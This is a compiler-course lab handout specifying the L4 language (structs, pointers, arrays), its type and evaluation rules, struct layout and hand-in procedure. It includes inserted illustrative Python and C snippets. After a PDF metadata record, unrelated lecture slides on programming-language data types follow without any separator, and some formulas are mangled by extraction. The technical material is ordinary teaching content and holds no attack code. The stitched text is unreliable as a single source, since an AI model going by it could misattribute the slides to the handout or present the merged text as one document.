1 Introduction The goal of the lab is to implement a complete compiler for the language $L_4$. This language extends $L_3$ by structs (in the sense of C), pointers, and arrays. This means the main change from the third lab is that you will have to deal with memory references. Because pointers on the x86-64 architecture are 64 bits wide, this also means you will have to deal with differently sized data. Again, performance of both the compiler and the compiled code are only minor considerations at this stage. However, the threshold for compilation time will be slightly tighter, so you may need to start to pay attention to some performance issues. 2 Requirements As for Labs 1, 2, and 3, you are required to hand in test programs as well as a complete working compiler that translates $L_4$ source programs into correct target programs written in x86-64 assembly language. When encountering an error in the input program (which can be a lexical, grammatical, or static semantics error) the compiler should terminate with a non-zero exit code and print a helpful error message. To test the target programs, we will assemble and link them using gcc on the lab machines and run them under fixed but generous time limits. 3 $L_4$ Syntax The syntax of $L_4$ is defined by the context-free grammar in Figure 1. This is an extension of the grammar for $L_3$ in the sense that a correct $L_3$ program should still parse correctly if it does not use any of the new keywords. Ambiguities in this grammar are resolved according to the operator precedence table in Figure 2 and the rule that an else provides the alternative for the most recent eligible if. Comments are as in $L_3$. The precedence of unary and binary operators is given in Figure 2. Non-terminals are in ⟨angle brackets⟩, optional constituents in [brackets]. Terminals are in bold. Figure 1: Grammar of L4 4 L4 Runtime Objects The L4 language has four kinds of identifiers: those standing for functions (g), those standing for variables (x), those standing for structs (s), and those standing for field names (f). These are in separate name spaces, so a function, a variable, a struct, and a field may have the same name without conflict. Reserved words of the grammar (extern, struct, var, int, if, else, while, for, continue, break, return, NULL, new) cannot be used as any kind of name. The L4 language has some complexity in its new constructs, dealing with memory (structs, pointers, and arrays). In order to describe these concisely we use an abstract syntax notation. Eliding some expressions which are as in L3: \[ \begin{align*} \text{Types} & : \quad \tau ::= \text{int} \mid s \mid \tau^* \mid \tau[] \\ \text{Expressions} & : \quad e ::= c \mid \text{null} \mid x \mid *e \mid e.f \mid e[e] \mid e\rightarrow e \mid \text{new}\tau \mid \text{new}\tau[e] \mid \cdots \end{align*} \] We also have to consider the runtime objects created during the execution of a program. We divide these into two classes: small values and large values. Small values can be held in registers, large values must be in memory. We use a for an address of an object in memory and n for an integer. \[ \begin{align*} \text{Small Values} & : \quad w ::= a \mid n \\ \text{Large Values} & : \quad W ::= \{f_1=v_1; \ldots f_n=v_n;\} \mid [v_0, \ldots, v_{n-1}] \\ \text{Values} & : \quad V ::= w \mid W \end{align*} \] The first kind of large value is a struct with fields \( f_1, \ldots, f_n \), the second an array with \( n \) elements. 
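As a purely illustrative aside (not part of the lab handout), the abstract syntax above maps naturally onto algebraic-datatype-style definitions inside a compiler. The following Python sketch shows one possible representation of the L4 types and the new expression forms; all class and field names are our own invention.

```python
from dataclasses import dataclass
from typing import Union

# Types: tau ::= int | s | tau* | tau[]
@dataclass(frozen=True)
class IntType: pass

@dataclass(frozen=True)
class StructType:
    name: str            # struct name s

@dataclass(frozen=True)
class PointerType:
    elem: "Type"         # tau*

@dataclass(frozen=True)
class ArrayType:
    elem: "Type"         # tau[]

Type = Union[IntType, StructType, PointerType, ArrayType]

# New expression forms: *e, e.f, e1[e2], new tau, new tau[e]
@dataclass(frozen=True)
class Deref:
    addr: "Expr"         # *e

@dataclass(frozen=True)
class Field:
    base: "Expr"
    field: str           # e.f

@dataclass(frozen=True)
class Index:
    base: "Expr"
    index: "Expr"        # e1[e2]

@dataclass(frozen=True)
class Alloc:
    ty: Type             # new tau

@dataclass(frozen=True)
class AllocArray:
    ty: Type
    length: "Expr"       # new tau[e]

# plus the L3 forms (constants, variables, arithmetic, calls, ...)
Expr = Union[Deref, Field, Index, Alloc, AllocArray]
```

Keeping the types as a small closed set like this makes it straightforward to attach the size and alignment computations described next.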
On occasion, we need to know the exact size of objects of a given type, \(|\tau|\). We compute this as follows from the type: \[ |\text{int}| = 4 \\ |\tau*| = 8 \\ |\tau[\| = 8 \\ |s| = |f_1:\tau_1; \ldots f_n:\tau_n;| \] The size of a struct, written here as \(|f_1:\tau_1; \ldots f_n:\tau_n;|\) is computed by traversing the fields from left to right, adding padding as necessary so that alignment restrictions on the fields are satisfied. \textbf{int}'s are aligned at 0 mod 4, small values of type \( \tau* \) and \( \tau[\] are aligned at 0 mod 8, and structs are aligned according to their most strictly aligned field. Padding may need to be added at the end of a struct so that its total size is a multiple of its most strictly aligned field. Arrays \([V_0, \ldots, V_{n-1}]\) cannot be directly embedded in a struct or other array, since their size is unknown at compile time. This is the reason that a value of type \( \tau[\] \) is \textit{small}: it is merely the starting address of the array in memory. Arrays must be aligned according to the requirement of their elements. The start of an array is returned by a call to the \textbf{malloc} or \textbf{calloc} library function which guarantees an address 0 mod 8, which is the strictest alignment required in our language. Addresses are represented as 8 byte (unsigned) integers in the machine. They are obtained from the runtime system which allocates new memory, or by addition (address arithmetic). There is a special address 0 which is never returned by the runtime system and will be used to denote the null pointer. Memory access is represented as \( M[a] \), which reads from memory when used as a value and writes to memory when used on the left-hand side of an assignment \( M[a] \leftarrow w \). The number of bytes read or written depends on the size of the small value \( w \). Along similar lines, we write \( V[x] \) for the value of a variable \( x \). On the left hand side \( V[x] \leftarrow w \) assigns to \( x \); on the right hand side \( V[x] \) denotes the current value of \( x \). The most important judgments we make are typing, written \( e: \tau \), and evaluation, written \( e \Rightarrow w \). The first is part of the \textit{static semantics}, which must satisfy some additional conditions that are stated informally. The latter constitutes the \textit{dynamic semantics}, but is also only partially formal since evaluating expressions has effects that we only describe informally. As a general convention, expressions must be evaluated from left to right so that any side effects happen in a deterministic order. We now present both the static and dynamic semantics for each new construct (structs, pointers, arrays) in turn. \textbf{Structs} Statically, several properties must be checked for struct declarations. - Every type identifier \( s \) used in a struct declaration or function must be declared with an explicit \textbf{struct} \( s \{ \ldots \}; \) somewhere in the file. The order of \textbf{struct} declarations is irrelevant, but the syntax restricts the file so that they can be mixed with \textbf{extern} declarations but must precede all function definitions. - All struct declarations in a file must have distinct names \( s \). • Field names in a struct declaration must all be distinct. However, different struct declarations may reuse field names. • Fields of structs can refer to other structs which can in turn refer to other structs and so on. 
However, any circular reference from a struct to itself following such a chain must go through a pointer or array type. The main expression construct for structs is $e.f$. It is easily type-checked. $$ \frac{e : s \qquad \textbf{struct}\ s\ \{ \ldots f : \tau; \ldots \}}{e.f : \tau} $$ We write $\text{offset}(s, f)$ for the offset of field $f$ in structure $s$, in bytes. We suggest computing this information early and storing it in a table so that the compiler can access it easily. The evaluation rule is slightly tricky, and carries a recurring theme. In several circumstances evaluating an expression yields an address of some object in memory. When this object is small, we can return it directly as a small value for further computation. When the object is large, we cannot directly operate on the object, but must return its address instead. $$ e.f \Rightarrow M[a + k] \quad \text{if } e \Rightarrow a \text{ and } \text{offset}(s, f) = k $$ $$ \Rightarrow a + k \quad \text{as above, except that } \tau \text{ large} $$ We also have the derived form $e \rightarrow f$, which can be desugared into $(\ast e).f$. **Pointers** The typing rules for pointer operations are straightforward. $$ \frac{e : \tau^*}{\ast e : \tau} \qquad \textbf{new } \tau : \tau^* \qquad \textbf{null} : \tau^* $$ Unfortunately, the typing of the null pointer presents a challenge, since it potentially has infinitely many types. This is necessary so that expressions such as $p == \textbf{NULL}$ or statements such as $p->f = \textbf{NULL}$, where the left-hand side has some type $\tau^*$, are all well-typed. We suggest creating a new type any, used only internally. In key places during type-checking where some types are required to be equal, we can allow any on either side or both sides. In programming language terms we say that null is polymorphic; fortunately it is the only polymorphic construct in the language, so you can still implement a relatively simple type checker. The main places where type comparisons take place are in compiling equality ($==$), disequality ($!=$), assignments, and function calls. To avoid pathologies in type-checking, we disallow $\ast \textbf{null}$ because its type is ambiguous and may not be resolved by context. You can still reliably dereference the null pointer, should you be so inclined, for example with $\textbf{var } \textbf{null} : \textbf{int}^*; \textbf{null} = \textbf{NULL}; \ast \textbf{null};$ Assume a function $g$ has prototype $$ \tau\ g(x_1 : \tau_1, \ldots, x_n : \tau_n); $$ Then we have \[ \frac{e_i : \tau_i \quad (1 \leq i \leq n)}{g(e_1, \ldots, e_n) : \tau} \qquad \frac{e : \tau \quad (\textbf{return} \text{ in body of } g)}{\textbf{return } e \text{ valid}} \] where \textit{s valid} indicates that the statement \textit{s} is valid. The operational semantics for \( *e \) evaluates \( e \) to an address and then returns the memory contents at that address. Dereferencing the null pointer must raise the \textit{SIGSEGV} exception. In an implementation this can be accomplished without any checks, because the operating system will prevent read access to address 0 and raise the appropriate exception. 
- \texttt{null} \: \Rightarrow \: 0 - \( *e \) \: \Rightarrow \: M[a] \quad \text{if } e \Rightarrow a \text{ with } a \neq 0, \: e : \tau* \text{ and } \tau \text{ small} - \Rightarrow \: a \quad \text{as above, except that } \tau \text{ large} - \texttt{new } \tau \: \Rightarrow \: a \quad \text{where } M[a], \ldots, M[a + |\tau| - 1] \text{ are freshly allocated locations} The values stored in freshly allocated location must be all 0. This can be achieved with \texttt{calloc()} and means that values of type \texttt{int} are simply 0, values of type \( \tau* \) are null pointers, all fields of structs are recursively set to 0, and values of array type have address 0 which is akin to a null array reference. \textbf{Arrays} Arrays are similar to pointers. \[ \begin{array}{ccc} e_1 : \tau[\ ] & e_2 : \texttt{int} & e : \texttt{int} \\ e_1[e_2] : \tau & \texttt{new } \tau[e] : \tau[\ ] \end{array} \] \[ e_1[e_2] \: \Rightarrow \: M[a + n|\tau|] \quad \text{if } e_1 \Rightarrow a \text{ and } e_2 \Rightarrow n \text{ with } e_1 : \tau[\ ], \: \tau \text{ small} \] \[ \Rightarrow \: a + n|\tau| \quad \text{as above, except that } \tau \text{ large} \] \[ \linebreak[1] \texttt{new } \tau[e] \: \Rightarrow \: a \quad \text{if } e \Rightarrow n \text{ and } M[a], \ldots, M[a + (n - 1)|\tau|] \text{ are freshly allocated} \] Values in a freshly allocated array are all initialized to 0, as for pointers. The value of an out-of-bounds array access is \textit{undefined} in this version of the language. \textbf{Assignment} Assignment is now more general, because the left-hand side need not be a variable, but could be a more complicated expression so we can write, for example, \( *p = *q \) to copy the contents of \( q \) to the location denoted by \( p \). The left-hand side of an assignment must be a so-called \textit{lvalue} ("left value"), which is a certain kind of expression. We define lvalues, assuming that the expression is already known to be well-typed. \[ \text{Lvalues } v ::= x \mid *e \mid e.f \mid e_1[e_2] \] For an assignment to be a valid statement, the lvalue on the left-hand side must have a small type. \[ \frac{v : \tau \quad e : \tau \quad \tau \text{ small}}{v = e \text{ valid}} \] We also have a new statement which is just an expression \( e \) which is evaluated for possible effects. \( e \) is also required to have small type and its computed value is discarded so that it can be seen as shorthand for \( x = e \) where \( x \) is a fresh variable not used anywhere else. To show how assignment evaluates we use some notational slight of hand. \[ v = e \text{ has the effect of } V[x] \leftarrow w \] \[ \text{if } v \Rightarrow V[x] \text{ and } e \Rightarrow w \] \[ \text{has the effect of } M[a] \leftarrow w \] \[ \text{if } v \Rightarrow M[a] \text{ and } e \Rightarrow w \] Because we check that \( v \) is an lvalue and that the type of \( e \) is small, this should cover all possible cases. Note that \( v \) must be evaluated before \( e \). The meaning of complex assignment operators now also changes and is no longer a syntactic expansion because expressions can have side effects. An assignment \[ v \ op= e \] should execute as \[ V[x] \leftarrow V[x] \ op w \ \text{if } v \Rightarrow V[x] \text{ and } e \Rightarrow w \] \[ M[a] \leftarrow M[a] \ op w \ \text{if } v \Rightarrow M[a] \text{ and } e \Rightarrow w \] **Functions** Regarding functions, several properties must be checked. 
- Every function that is called must be declared somewhere in the file, either using `extern` or with a definition. The order of the functions in the file is irrelevant, but a function may not be declared more than once. - Functions must be called with the correct number of arguments of the correct type. - All function arguments and function results must be of small type. - Functions must terminate with an explicit `return` statement. This is checked by verifying that each finite control flow path originating at the top of a function ends in a `return` statement. See a more detailed explanation in the description of \( L2 \). - There must be a function `main()` which returns an integer as the result of the overall computation (and not an exit status). - Each `break` or `continue` statement must occur inside a `for` or `while` loop. Variables Regarding variables, we need to check three properties, the last of which is new for this language. • Every variable must be declared, either as a function parameter or an explicit local variable with a `var` declaration. Function parameters and local variables are local to a function and have nothing to do with parameters or local variables in other functions. Variables may not be redeclared, that is, names of parameters to a given function and its local variables must all be pairwise distinct. There are no global variables. • Each local variable must be defined by an assignment before it is used. This is checked by verifying that along all control flow paths originating at the beginning of the function, each local variable is assigned to before it is used. This ensures that there will be no references to uninitialized variables. A precise specification of this condition is given in Lab 2. • Any variable, either a function parameter or locally declared variable, must have a small type. Variables of large type are not permitted. This simplifies parameter passing considerably. The lack of bounds check and this language means that, unlike L3, there are programs in L4 whose result is not defined. Such programs are considered to be “erroneous”, although the compiler must permit them. For your test cases, you may not submit programs whose behavior is undefined. Overloaded Operators Equality (==) and disequality (!=) are overloaded, applying to both integers and pointers. See the discussion above on pointers. Operationally, the compiler will have to choose a 4 byte or 8 byte comparison for the two versions, which suggests after type-checking and during translation to intermediate code there should be two explicitly different operators. 5 Project Requirements For this project, you are required to hand in test cases and a complete working compiler for L4 that produces correct target programs written in Intel x86-64 assembly language. When we grade your work, we will use the gcc compiler to assemble and link the code you generate into executables using the provided runtime environment on the lab machines. Test Files Test files should have extension .l4 and start with one of the following lines ``` #test return i #test exception n #test error ``` followed by the program text. If an exception number is missing, any exception is accepted. Defined exceptions are at least SIGFPE (8), SIGSEGV (11), and SIGALRM (14). These are raised by division by 0 or division overflow (8), dereference of 0, stack overflow, or out-of-memory situations (11), or by a time-out (14). 
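The test directive format above is simple enough that a small helper can classify a test file's expected outcome. The following Python sketch is hypothetical (the handout does not prescribe any such tool); only the `#test` syntax and the signal numbers come from the text.

```python
import re

def parse_test_directive(first_line: str):
    """Classify the first line of a .l4 test file; return shape is our own convention."""
    line = first_line.strip()
    if m := re.fullmatch(r"#test return (-?\d+)", line):
        return ("return", int(m.group(1)))
    if m := re.fullmatch(r"#test exception(?: (\d+))?", line):
        # The exception number is optional; None means any exception is accepted.
        return ("exception", int(m.group(1)) if m.group(1) else None)
    if line == "#test error":
        return ("error", None)
    raise ValueError(f"not a valid test directive: {first_line!r}")

# Examples matching the handout:
assert parse_test_directive("#test return 42") == ("return", 42)
assert parse_test_directive("#test exception 8") == ("exception", 8)   # SIGFPE
assert parse_test_directive("#test exception") == ("exception", None)  # any exception
assert parse_test_directive("#test error") == ("error", None)
```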
All test files should be collected into a directory `test/` (containing no other files) and submitted via the Autolab server. Your test programs must test the new features of \textit{L4}: structs, pointers, and arrays. Since the language is backward compatible except for conflicts with reserved words, we may also use the \textit{L3} test cases for regression testing. We cannot test programs whose results are undefined. It is therefore critical that your test programs do not perform any operations whose meaning is undefined. This includes accessing an array out of bounds or accessing a null array. We would like some fraction of your test programs to compute “interesting” functions; please briefly describe such examples in a comment in the file. Disallowed are sorting programs. \textbf{Compiler Files} The files comprising the compiler itself should be collected in a directory \texttt{compiler/} which should contain a \texttt{Makefile}. \textbf{Important:} You should also update the \texttt{README} file and insert a description of your code and algorithms used at the beginning of this file. This will be a crucial guide for the grader. Issuing the shell command \begin{verbatim} % make l4c \end{verbatim} should generate the appropriate files so that \begin{verbatim} % bin/l4c <args> \end{verbatim} will run your \textit{L4} compiler. The command \begin{verbatim} % make clean \end{verbatim} should remove all binaries, heaps, and other generated files. \textbf{Using the Subversion Repository} The recommended method for handout and handin is the course subversion repository. The handout files for this course can be checked out from our subversion repository via \begin{verbatim} % svn checkout https://cvs.concert.cs.cmu.edu/15-411/<team> \end{verbatim} where \texttt{<team>} is the name of your team. You will find materials for this lab in the \texttt{lab4} subdirectory. Or, if you have checked out \texttt{15-411/<team>} directory before, you can issue the command \texttt{svn update} in that directory. After first adding (with \texttt{svn add} or \texttt{svn copy} from a previous lab) and committing your handin directory (with \texttt{svn commit}) to the repository you can hand in your tests or compiler by selecting \texttt{S5b - Autograde your code in svn repository} from the Autolab server menu. It will perform one of \begin{verbatim} % svn checkout https://cvs.concert.cs.cmu.edu/15-411/<team>/lab4/tests % svn checkout https://cvs.concert.cs.cmu.edu/15-411/<team>/lab4/compiler \end{verbatim} to obtain the files directories to autograde, depending on whether you are handing in your test files or your compiler. If you are submitting multiple versions, please remember to commit your changes to the repository before asking the Autolab server to grade them! And please do not include an compiled files or binaries in the repository! Uploading tar Archives A deprecated method for handout and handin is the download and upload of tar archives from the Autolab server. For the test cases, bundle the directory tests as a tar file tests.tar with % tar -cvf tests.tar tests/ to be submitted via the Autolab server. For the compiler, bundle the directory compiler as a tar file compiler.tar. In order to keep the files you hand in to a reasonable size, please clean up the directory and then bundle it as a tar file. For example: % cd compiler % make clean % cd .. % tar -cvf compiler.tar --exclude CVS compiler/ to be submitted via the Autolab server. 
Please do not include any compiled files or binaries in your hand-in file! What to Turn In Hand-in on the Autolab server: - At least 20 test cases, at least two of which generate as error and at least two others raise a runtime exception. The directory tests/ should only contain your test files and be submitted via subversion or as a tar file as described above. The server will test your test files and notify you if there is a discrepancy between your answer and the outcome of the reference implementation. You may hand in as many times as you like before the deadline without penalty. If you feel the reference implementation is in error, please notify the instructors. The compiled binary for each test case should run in 2 seconds with the reference compiler on the lab machines; we will use a 5 second limit for testing compilers. Test cases are due 11:59pm on Tue Oct 21, 2008. - The complete compiler. The directory compiler/ should contain only the sources for your compiler and be submitted via subversion or as a tar file as described above. The Autolab server will build your compiler, run it on all extant test files, link the resulting assembly files against our runtime system (if compilation is successful), execute the binaries (each with a 5 second time limit), and finally compare the actual with the expected results. You may hand in as many times as you like before the deadline without penalty. Compilers are due 11:59pm on Tue Oct 28, 2008. 6 Notes and Hints There is no address-of operator (&), and variables (be it local variables or procedure parameters) cannot hold large values. The suggested implementation therefore is to allocate structs and arrays on the heap. Our runtime system provides the function `void* calloc(size_t nobj, size_t nbytes);` for this purpose, which allocates an array of `nobj` objects of size `nbytes` all initialized to 0. Your assembly code should call this function as necessary, assuming `size_t` is `unsigned int` (4 bytes). There is no corresponding `free`, since we use a conservative garbage collector to reclaim storage. To check that struct declarations are well-founded, we suggest a simple cycle-checking depth-first search which is in any case necessary to compute field offsets. Global tables to keep struct sizes, field offsets, and the types of functions seem like an appropriate strategy. Data now can have different sizes, and you need to track this information throughout the various phases of compilation. We suggest you read Section 4 of the Bryant/O’Hallaron note on x86-64 Machine-Level Programming available from the Resources page, especially the paragraph on move instructions and the effects of 32 bit operators in the upper 32 of the 64 bit registers. Your code must strictly adhere to the struct alignment requirements explained above. You may also read the Section 3.1.2 in the Application Binary Interface description available from the Resources page. Also, the C calling conventions detailed in Lab 3 must still be obeyed. Since no large values can be passed, this remains relatively straightforward. Also as in Lab 3, functions declared with `extern` must retain their name, while all defined functions `g` must be exported as symbols `_l4_g`. This prevents any conflicts between a C standard library function and the L4 name of a function. When a function `_l4_g` is declared with `extern`, there may not be a local function `g` to avoid ambiguity. 
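To illustrate the size and offset tables suggested above, here is a small Python sketch that follows the layout rules from Section 4: `int` is 4 bytes aligned at 4, pointers and arrays are 8-byte addresses aligned at 8, each field is padded to its own alignment, and the total size of a struct is padded to a multiple of its most strictly aligned field. The encoding of types and all function names are our own; this is a sketch, not a required design.

```python
# A field type is encoded as ("int",), ("ptr",), ("array",) or ("struct", name);
# only the layout rules themselves come from the handout.

def align_up(offset, alignment):
    """Round offset up to the next multiple of alignment."""
    return (offset + alignment - 1) // alignment * alignment

def size_and_align(ty, struct_layouts):
    """Size and alignment of a type: int -> (4, 4); tau*, tau[] -> (8, 8); struct s -> from table."""
    kind = ty[0]
    if kind == "int":
        return 4, 4
    if kind in ("ptr", "array"):      # small values: just an address
        return 8, 8
    size, alignment, _ = struct_layouts[ty[1]]
    return size, alignment

def layout_struct(fields, struct_layouts):
    """Compute (total size, alignment, field offsets) for fields given as [(name, type), ...]."""
    offset, max_align, offsets = 0, 1, {}
    for name, ty in fields:
        size, alignment = size_and_align(ty, struct_layouts)
        offset = align_up(offset, alignment)   # pad so this field is properly aligned
        offsets[name] = offset
        offset += size
        max_align = max(max_align, alignment)
    return align_up(offset, max_align), max_align, offsets   # pad total size at the end

# struct point { x:int; y:int; next:point*; }  ->  x at 0, y at 4, next at 8, size 16
layouts = {}
layouts["point"] = layout_struct(
    [("x", ("int",)), ("y", ("int",)), ("next", ("ptr",))], layouts)
print(layouts["point"])   # (16, 8, {'x': 0, 'y': 4, 'next': 8})
```

A cycle check over struct references (the depth-first search suggested above) would run before calling `layout_struct`, since a struct's layout can only be computed once the layouts of all directly embedded structs are known.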
### Run-time Environment

The tests will be run in the standard Linux environment on the lab machines; the produced assembly code must conform to those standards. We recommend the use of `gcc -S` to produce assembly files from C sources, which can provide template code and assembly language examples. We will link your code against some library functions you can find in the files `runtime/l4rt.h` and `runtime/l4rt.c`. This will allow us to test your adherence to the C calling conventions on the x86-64 architecture, and it will allow you to call some standard library functions, say, to print messages, painful though it may be in a language without strings. The functions we explicitly define can be declared in L4 as

```c
extern int printchar(c:int); /* print c as ASCII character */
extern int printint(n:int);  /* print n in decimal */
extern int printhex(n:int);  /* print n in hexadecimal */
```

More may be available as the code is released and updated. If your compiler detects any (compile-time) errors in the source program, it should exit with a non-zero return code. If compilation succeeds and target code is generated, the compiler should then exit with a return code of 0.

### 7 Changes

**Revision 1.** The compiler must check that an external symbol `_l4_g` does not conflict with an internal function `g`. This prevents confusion between the two symbols while permitting multiple L4 files to be linked.

**Revision 2.** The type checker must reject `*NULL` because it can have any type, which leads to problems in type checking. So, for example, `(*NULL).f` might have been legal in the first spec, but type-checking it is unreasonable since multiple structs may have an `f` field. The new restriction can be checked, for example, by verifying that in `*e` the expression `e` does not have type `any*`.
{"Source-Url": "http://www.cs.cmu.edu/afs/cs.cmu.edu/user/fp/www/courses/15411-f08/misc/lab4.pdf", "len_cl100k_base": 6369, "olmocr-version": "0.1.49", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 35246, "total-output-tokens": 7086, "length": "2e12", "weborganizer": {"__label__adult": 0.00039267539978027344, "__label__art_design": 0.0003066062927246094, "__label__crime_law": 0.0002205371856689453, "__label__education_jobs": 0.0014104843139648438, "__label__entertainment": 6.335973739624023e-05, "__label__fashion_beauty": 0.00016069412231445312, "__label__finance_business": 0.00016963481903076172, "__label__food_dining": 0.00047135353088378906, "__label__games": 0.0005402565002441406, "__label__hardware": 0.0012559890747070312, "__label__health": 0.00028133392333984375, "__label__history": 0.0002092123031616211, "__label__home_hobbies": 0.00013303756713867188, "__label__industrial": 0.00054168701171875, "__label__literature": 0.00027942657470703125, "__label__politics": 0.00019788742065429688, "__label__religion": 0.00048232078552246094, "__label__science_tech": 0.00627899169921875, "__label__social_life": 0.00010603666305541992, "__label__software": 0.0030193328857421875, "__label__software_dev": 0.982421875, "__label__sports_fitness": 0.00029206275939941406, "__label__transportation": 0.000675201416015625, "__label__travel": 0.00022411346435546875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25872, 0.01147]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25872, 0.42772]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25872, 0.87206]], "google_gemma-3-12b-it_contains_pii": [[0, 1683, false], [1683, 1874, null], [1874, 3377, null], [3377, 6753, null], [6753, 9499, null], [9499, 12009, null], [12009, 14476, null], [14476, 17221, null], [17221, 19985, null], [19985, 22298, null], [22298, 25490, null], [25490, 25872, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1683, true], [1683, 1874, null], [1874, 3377, null], [3377, 6753, null], [6753, 9499, null], [9499, 12009, null], [12009, 14476, null], [14476, 17221, null], [17221, 19985, null], [19985, 22298, null], [22298, 25490, null], [25490, 25872, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, true], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25872, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25872, null]], "pdf_page_numbers": [[0, 1683, 1], [1683, 1874, 2], [1874, 3377, 3], [3377, 6753, 4], [6753, 9499, 5], [9499, 12009, 6], [12009, 14476, 7], [14476, 17221, 8], [17221, 19985, 9], [19985, 22298, 10], [22298, 25490, 11], [25490, 25872, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25872, 0.00457]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
06baab034eb15a19f3dd10212101b7ffbba53d09
Chapter 6 Data Types Chapter 6 Topics • Introduction • Primitive Data Types • Character String Types • User-Defined Ordinal Types • Array Types • Associative Arrays • Record Types • Tuple Types • List Types • Union Types • Pointer and Reference Types • Type Checking • Strong Typing • Type Equivalence • Theory and Data Types Introduction - A *data type* defines a collection of data objects and a set of predefined operations on those objects - A *descriptor* is the collection of the attributes of a variable - An *object* represents an instance of a user-defined (abstract data) type - One design issue for all data types: What operations are defined and how are they specified? Primitive Data Types • Almost all programming languages provide a set of *primitive data types* • Primitive data types: Those not defined in terms of other data types • Some primitive data types are merely reflections of the hardware • Others require only a little non-hardware support for their implementation Primitive Data Types: Integer - Almost always an exact reflection of the hardware so the mapping is trivial - There may be as many as eight different integer types in a language - Java’s signed integer sizes: `byte`, `short`, `int`, `long` Primitive Data Types: Floating Point - Model real numbers, but only as approximations - Languages for scientific use support at least two floating-point types (e.g., `float` and `double`; sometimes more - Usually exactly like the hardware, but not always - IEEE Floating-Point Standard 754 Primitive Data Types: Complex - Some languages support a complex type, e.g., C99, Fortran, and Python - Each value consists of two floats, the real part and the imaginary part - Literal form (in Python): \[(7 + 3j)\], where 7 is the real part and 3 is the imaginary part Primitive Data Types: Decimal • For business applications (money) – Essential to COBOL – C# offers a decimal data type • Store a fixed number of decimal digits, in coded form (BCD) • Advantage: accuracy • Disadvantages: limited range, wastes memory Primitive Data Types: Boolean • Simplest of all • Range of values: two elements, one for “true” and one for “false” • Could be implemented as bits, but often as bytes – Advantage: readability Primitive Data Types: Character • Stored as numeric codings • Most commonly used coding: ASCII • An alternative, 16-bit coding: Unicode (UCS-2) – Includes characters from most natural languages – Originally used in Java – C# and JavaScript also support Unicode • 32-bit Unicode (UCS-4) – Supported by Fortran, starting with 2003 Character String Types • Values are sequences of characters • Design issues: – Is it a primitive type or just a special kind of array? – Should the length of strings be static or dynamic? Character String Types Operations • Typical operations: – Assignment and copying – Comparison (=, >, etc.) 
– Catenation – Substring reference – Pattern matching Character String Type in Certain Languages - **C and C++** - Not primitive - Use `char` arrays and a library of functions that provide operations - **SNOBOL4 (a string manipulation language)** - Primitive - Many operations, including elaborate pattern matching - **Fortran and Python** - Primitive type with assignment and several operations - **Java** - Primitive via the `String` class - **Perl, JavaScript, Ruby, and PHP** - Provide built-in pattern matching, using regular expressions Character String Length Options • Static: COBOL, Java’s String class • Limited Dynamic Length: C and C++ – In these languages, a special character is used to indicate the end of a string’s characters, rather than maintaining the length • Dynamic (no maximum): SNOBOL4, Perl, JavaScript • Ada supports all three string length options Character String Type Evaluation • Aid to writability • As a primitive type with static length, they are inexpensive to provide--why not have them? • Dynamic length is nice, but is it worth the expense? Character String Implementation - Static length: compile-time descriptor - Limited dynamic length: may need a run-time descriptor for length (but not in C and C++) - Dynamic length: need run-time descriptor; allocation/deallocation is the biggest implementation problem Compile- and Run-Time Descriptors <table> <thead> <tr> <th>Static string</th> <th>Limited dynamic string</th> </tr> </thead> <tbody> <tr> <td>Length</td> <td>Maximum length</td> </tr> <tr> <td>Address</td> <td>Current length</td> </tr> </tbody> </table> Compile-time descriptor for static strings Run-time descriptor for limited dynamic strings User-Defined Ordinal Types • An ordinal type is one in which the range of possible values can be easily associated with the set of positive integers • Examples of primitive ordinal types in Java – integer – char – boolean Enumeration Types • All possible values, which are named constants, are provided in the definition • C# example ```csharp enum days {mon, tue, wed, thu, fri, sat, sun}; ``` • Design issues – Is an enumeration constant allowed to appear in more than one type definition, and if so, how is the type of an occurrence of that constant checked? – Are enumeration values coerced to integer? – Any other type coerced to an enumeration type? 
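As a concrete (and purely illustrative) answer to the coercion questions above: in C, enumeration values coerce freely to `int`, and arbitrary `int` values can be stored back into an enumeration variable without any check, which is precisely the looseness that stricter languages avoid.

```c
#include <stdio.h>

enum days { mon, tue, wed, thu, fri, sat, sun };

int main(void) {
    enum days d = wed;

    int n = d + 1;   /* enumeration value coerced to int: n == 3 */
    d = 42;          /* C also accepts this, even though 42 is not
                        one of the named enumeration constants */

    printf("%d %d\n", n, d);   /* prints: 3 42 */
    return 0;
}
```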
